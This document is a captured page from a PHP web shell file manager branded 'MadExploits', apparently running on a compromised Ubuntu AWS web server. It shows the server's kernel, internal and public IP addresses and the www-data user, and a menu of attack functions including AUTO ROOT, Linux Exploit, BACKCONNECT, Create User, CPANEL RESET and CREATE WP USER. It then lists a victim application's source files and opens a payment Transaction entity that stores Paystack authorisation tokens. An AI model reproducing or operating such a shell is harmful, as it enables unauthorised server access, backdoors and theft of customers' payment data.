Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.221.139.13
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
src /
Entity /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
0
B
-rw-rw-r--
Activity.php
2.09
KB
-rw-rw-r--
Customer.php
2.1
KB
-rw-rw-r--
Groups.php
1.83
KB
-rw-rw-r--
Inventory.php
1.4
KB
-rw-rw-r--
Item.php
4.68
KB
-rw-rw-r--
ItemPart.php
2.29
KB
-rw-rw-r--
OrderDelivery.php
3.72
KB
-rw-rw-r--
OrderItem.php
3.3
KB
-rw-rw-r--
Orders.php
6.46
KB
-rw-rw-r--
Spillage.php
2.02
KB
-rw-rw-r--
Stock.php
3.77
KB
-rw-rw-r--
Subscription.php
2.75
KB
-rw-rw-r--
Supplier.php
3.45
KB
-rw-rw-r--
Supply.php
3.23
KB
-rw-rw-r--
SupplyItem.php
2.95
KB
-rw-rw-r--
Transaction.php
2.34
KB
-rw-rw-r--
Users.php
9.95
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Transaction.php
<?php namespace App\Entity; use Doctrine\ORM\Mapping as ORM; /** * @ORM\Entity(repositoryClass="App\Repository\TransactionRepository") */ class Transaction { /** * @ORM\Id() * @ORM\GeneratedValue() * @ORM\Column(type="integer") */ private $id; /** * @ORM\Column(type="datetime") */ private $created; /** * @ORM\Column(type="integer") */ private $user_id; /** * @ORM\Column(type="integer") */ private $amount; /** * @ORM\Column(type="string", length=255, nullable=true) */ private $reference; /** * @ORM\Column(name="paystack_auth", type="string", length=255, nullable=true) */ private $paystack_auth; /** * Last four digits of card * @ORM\Column(type="integer", nullable=true) * * @var integer **/ private $last_four; public function getId(): ?int { return $this->id; } public function getCreated(): ?\DateTimeInterface { return $this->created; } public function setCreated(\DateTimeInterface $created): self { $this->created = $created; return $this; } public function getUserId(): ?int { return $this->user_id; } public function setUserId(int $user_id): self { $this->user_id = $user_id; return $this; } public function getAmount(): ?int { return $this->amount; } public function setAmount(int $amount): self { $this->amount = $amount; return $this; } public function getReference(): ?string { return $this->reference; } public function setReference(?string $reference): self { $this->reference = $reference; return $this; } public function getLastFour(): ?int { return $this->last_four; } public function setLastFour(int $last_four): self { $this->last_four = $last_four; return $this; } /** * @return String */ public function getPaystackAuth(): ?string { return $this->paystack_auth; } /** * @param String $paystack_auth * @return self */ public function setPaystackAuth(string $paystack_auth): self { $this->paystack_auth = $paystack_auth; return $this; } }
Close